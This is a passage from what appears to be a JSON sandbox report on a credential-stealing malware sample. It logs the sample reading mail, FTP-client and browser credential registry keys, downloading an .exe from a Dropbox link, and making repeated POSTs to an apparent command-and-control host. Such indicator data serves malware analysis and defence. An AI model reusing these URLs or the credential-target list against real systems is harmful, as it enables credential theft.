1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Firefox 25.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Firefox 25.0\\bin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\189cba75c69c634996739bac92103ebb", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1a8bd43e654f65418fbafadeef063a57", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1cfb96c6c96b454ebff73da2e9f63f51", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\467888fc50a6c6448d6cc0cf7b5307d6", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\48dea081c9634a43a6861907855add5c", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\55aad8d134512d438564aa678cb92d66", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\71b0295bef58e344911262b243f005ac", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\Software\\Microsoft\\Internet Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Account Manager", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Mail", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Martin Prikryl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Martin Prikryl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Ghisler\\Windows Commander", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Windows Commander", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Total Commander", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\FileZilla", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\FileZilla Client", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\FileZilla", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\FileZilla Client", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\IntelliForms\\FormData", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Adobe Flash Player Plugin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Google Chrome", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Mozilla Firefox 25.0 (x86 en-US)", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MozillaMaintenanceService", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VMRayVMTools", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{26A24AE4-039D-4CA4-87B4-2F03217071FF}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{4A03706F-666A-4037-7777-5F2748764D10}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{582EA838-9199-3518-A05C-DB09462F68EC}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{68306422-7C57-373F-8860-D26CE4BA2A15}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e52a6842-b0ac-476e-b48f-378a97a67346}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "aaopsjdf.top/X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "www.google.com/", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_2", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_3", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_4", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\microsoft onedrive.rig", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_5", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_7", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_9", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab4336.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_10", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar4337.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_13", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab43c5.tmp", "sha1_hash": 